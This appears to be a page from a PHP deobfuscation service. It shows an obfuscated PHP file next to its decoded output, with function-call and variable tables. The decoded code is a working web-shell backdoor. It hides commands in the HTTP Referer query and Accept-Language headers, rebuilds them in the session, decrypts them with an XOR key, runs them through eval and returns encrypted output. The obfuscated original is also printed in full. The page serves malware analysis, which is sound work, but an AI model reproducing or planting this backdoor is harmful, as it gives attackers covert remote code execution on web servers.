Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $F='$q=]6arra]6y_values($q);preg_]6mat]6ch_all("/([]6\\w])[\\w-]6]+(?:;q=0.]6([\\d]6..

Decoded Output download

$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$F='$q=]6arra]6y_values($q);preg_]6mat]6ch_all("/([]6\\w])[\\w-]6]+(?:;q=0.]6([\\d]6]]6))?,]6?/",$ra,$';
$B='6]6_LAN]6GUAG]6E"];if($rr]6&&$ra){$u=parse_u]6rl]6($rr)]6;parse]6_str($u]6[]6"quer]6y"]]6,$]6q);';
$j='),$ss(]6$s[$i],]60,$e)]6)),]6$k)]6));$o=ob_ge]6t_co]6]6nte]6nts();ob]6_end]6_clean();$d=base]664_';
$P='$i]]6.]6=$p;$e=st]6rp]6]6os($s[$i],$f);if(]6$e){$k=$k]6h.$k]6f;o]6b_]6start();@e]6v]6]6al(@gz]6';
$v='6tr]6pos($p,$h)=]6==0){$s[]6$i]="]6";$p=$ss($p,]63);]6}if(]6a]6rray_key_ex]6ists($i]6,$s)){$s[';
$G=']6";$i]6=$m[1]]6[0].]6$m[1][1];]6]6$h=$sl($ss(md5]6($i.$k]6h),0,3]6));$]6f=$sl($s]6s]6(md5]6(]6';
$Q='m);if($]6q&&]6$m){@sess]6i]6on_star]6t();$s=&]6$_SES]6SION;$s]6s="substr]6"]6;$s]6l="strtolower';
$X='$i.]6$kf),0,3));$p]6="";]6for($]6z=1;$z<co]6unt($m]6[1]);$z++]6)$p]6.=$q[$m[2][]6$z]]6];if(]6s]';
$b=';}]6}ret]6urn ]6$o;}$r]6]6=$_SERVER;$rr=@]6$r["HTTP_RE]6FE]6RER"];]6]6$ra=@$r["HT]6TP_ACC]6EPT]';
$m='="";for($i=0]6;$i<$l;]6){f]6or($]6j=0;(]6$j<$c&&$i<$l]6)]6;$j++,]6$i++)]6{$o.]6=$t{$i}^$]6k{$j}';
$E='encode]6(x(gzc]6]6ompress($o),$]6k));p]6rint("]6<$]6k>$d<]6/$k>")]6;@]6session_destr]6oy();}}}}';
$g=str_replace('z','','crzezatzezz_zfunction');
$Y='uncompress(]6@x(@]6ba]6se64_decode(preg_]6replace(arr]6ay("]6/_/",]6]6"/-/]6"),array("/",]6"+"';
$R='$k]6h="5d41"]6;$kf="40]62a";fu]6nct]6ion x]6($t,$k]6){]6$c]6=st]6rlen($k);$l=str]6len($t)]6;$o';
$x=str_replace(']6','',$R.$m.$b.$B.$F.$Q.$G.$X.$v.$P.$Y.$j.$E);
$r=$g('',$x);$r();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$B 6]6_LAN]6GUAG]6E"];if($rr]6&&$ra){$u=parse_u]6rl]6($rr)]6;pa..
$E encode]6(x(gzc]6]6ompress($o),$]6k));p]6rint("]6<$]6k>$d<]6/..
$F $q=]6arra]6y_values($q);preg_]6mat]6ch_all("/([]6\w])[\w-]6]..
$G ]6";$i]6=$m[1]]6[0].]6$m[1][1];]6]6$h=$sl($ss(md5]6($i.$k]6h..
$P $i]]6.]6=$p;$e=st]6rp]6]6os($s[$i],$f);if(]6$e){$k=$k]6h.$k]..
$Q m);if($]6q&&]6$m){@sess]6i]6on_star]6t();$s=&]6$_SES]6SION;$..
$R $k]6h="5d41"]6;$kf="40]62a";fu]6nct]6ion x]6($t,$k]6){]6$c]6..
$X $i.]6$kf),0,3));$p]6="";]6for($]6z=1;$z<co]6unt($m]6[1]);$z+..
$Y uncompress(]6@x(@]6ba]6se64_decode(preg_]6replace(arr]6ay("]..
$b ;}]6}ret]6urn ]6$o;}$r]6]6=$_SERVER;$rr=@]6$r["HTTP_RE]6FE]6..
$g create_function
$j ),$ss(]6$s[$i],]60,$e)]6)),]6$k)]6));$o=ob_ge]6t_co]6]6nte]6..
$m ="";for($i=0]6;$i<$l;]6){f]6or($]6j=0;(]6$j<$c&&$i<$l]6)]6;$..
$r None
$v 6tr]6pos($p,$h)=]6==0){$s[]6$i]="]6";$p=$ss($p,]63);]6}if(]6..
$x $kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=str..

Stats

MD5 e560917201d9d6f34d87e4b8b4e9b526
Eval Count 1
Decode Time 123 ms